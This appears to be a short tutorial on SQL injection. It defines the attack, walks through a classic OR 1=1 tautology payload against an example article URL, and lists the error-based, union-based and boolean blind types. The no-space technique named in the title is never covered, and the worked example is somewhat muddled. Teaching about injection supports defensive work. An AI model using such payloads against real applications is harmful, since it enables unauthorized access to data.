Exploiting SQL injection with no space

With Exploitation scenario:

SQL Injection: A SQLI attack consists of an injection in SQL query via user supplied input to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute operations on the database.

SQLi occurs when an application uses invalidated user input to dynamically construct SQL query.

Example: We want to retrieving data from a library application that publishes articles.

1) The application executes SQL query which returns public articles. The URL looks like this https://blog.test.com/articles.php?status=public. Which executes this query

SELECT * FROM library WHERE category = ‘articles’ AND status = ‘public’.

2) Attacker tries to retrieve all articles (public and confidential) so he modify above

Sql query simply by using an OR statement such as articles’ or 1=1 — ‘.

SELECT * FROM library WHERE category = ‘articles’ OR 1=1 — ’ and status =’public’

3) Since 1=1 is a true statement, all articles (public and confidential) are retrieved.

Types:

● In-band SQLI /Classic: The malicious user uses the same communication channel to launch the attack and gather results.

Error-based: This technique relies on the error thrown by the database server to obtain information about the structure of the database.

Union-based: This technique relies on UNION SQL operator to combine multiple SELECT statements to get a single result, returned as part of the HTTP response.

● Inferential /Blind: In this technique, an attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure.

Boolean: Attacker sends a SQL query to the database and the result varies depending on whether the query is true or false. Based on the result, the information within the HTTP response will modify or stay unchanged. Based on the response, the attacker can infer if it’s a true or a false result.